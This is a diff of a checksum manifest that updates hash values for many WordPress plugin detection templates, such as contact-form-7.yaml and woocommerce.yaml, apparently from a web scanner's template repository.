+http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
+http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
+http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
+http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
+http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
+http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
+http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
+http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
+http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
-http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
-http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
-http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
-http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
-http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
-http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
-http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
-http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
-http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
-http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
-http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
-http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
+http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
+http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
+http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
+http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
+http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
+http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
+http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
+http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
+http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
+http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
+http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
+http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
+http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
